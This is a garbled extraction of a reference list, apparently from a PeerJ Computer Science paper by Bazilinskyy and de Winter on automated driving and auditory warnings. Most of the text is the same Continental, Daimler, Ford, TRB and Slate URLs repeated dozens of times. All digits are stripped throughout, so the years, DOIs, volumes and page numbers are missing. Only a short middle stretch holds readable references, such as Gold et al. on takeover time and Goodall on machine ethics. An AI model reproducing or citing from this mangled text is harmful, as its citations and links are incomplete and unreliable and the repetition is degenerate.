https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /journal.pone. http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://www.daimler.com/dccom/ - - - - - - - - - - - - - - - - - - - .html http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /j.promfg. . . http://dx.doi.org/ . / - http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /peerj-cs. gasser t, westhoff d. . bast-study: definitions of automation and legal issues in germany. presented at the road vehicle automation workshop, transportation research board. available at http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/ gasser.pdf (accessed july ). godinho l, antónio j, tadeu a. . d sound scattering by rigid barriers in the vicinity of tall buildings. applied acoustics : – doi . /s - x( ) - . gold c, damböck d, lorenz l, bengler k. . “take over!” how long does it take to get the driver back into the loop? in: proceedings of the human factors and ergonomics society annual meeting, vol. . – . gomes l. . google self-driving car: it may never actually happen. available at http://www. slate.com/articles/technology/technology/ / /google self driving car it may never actually happen.html (accessed december ). goodall nj. . machine ethics and automated vehicles. in: meyer g, beiker s, eds. road vehicle automation. springer international publishing, – doi . / - - - - . gururaj g. . road traffic deaths, injuries and disabilities in india: current scenario. national medical journal of india : – . heikoop d, de winter jcf, van arem b, stanton na. . psychological constructs in driving automation: a consensus model and critical comment on construct proliferation (submitted for publication). hermann t, hunt a, neuhoff j. . the sonification handbook. berlin: logos publishing house. ho c, reed n, spence c. . multisensory in-car warning signals for collision avoidance. human factors : – doi . / x . holland s, morse dr, gedenryd h. . audiogps: spatial audio navigation with a minimal attention interface. personal and ubiquitous computing : – doi . /s . honda. . forward collision warning. available at http://owners.honda.com/vehicles/ information/ /accord-coupe/features/forward-collision-warning/ (accessed november ). howe j. . the rise of crowdsourcing. wired magazine : – . jamson ah, merat n, carsten o, lai fch. . fully-automated driving: the road to future vehicles. in: proceedings of the sixth international driving symposium on human factors in driver assessment, training and vehicle design, olympic valley—lake tahoe, ca. – . jamson ah, lai fch, carsten omj. . potential benefits of an adaptive forward collision warning system. transportation research part c: emerging technologies : – doi . /j.trc. . . . jonsson i-m, dahlbäck n. . i can’t hear you? drivers interacting with male or female voices in native or non-native language. in: stephanidis c, ed. universal access in human–computer interaction. context diversity. berlin heidelberg: springer-verlag, – . kessler c, etemad a, alessandretti g, heinig k, selpi, brouwer r, cserpinszky, hagleitner w, benmimoun m. . eurofot—final report (deliverable d . ). aachen, germany: eurofot consortium . available at http://www.eurofot-ip.eu/download/library/deliverables/ eurofotsp v dld final report.pdf (accessed july ). kingsley k. . evaluating crash avoidance countermeasures using data from fmcsa/nhtsa’s large truck crash causation study. in: st international technical conference on the enhanced safety of vehicles, stuttgart, germany. available at http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf (accessed july ). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/ /automation/presentations/gasser.pdf http://dx.doi.org/ . /s - x( ) - http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / 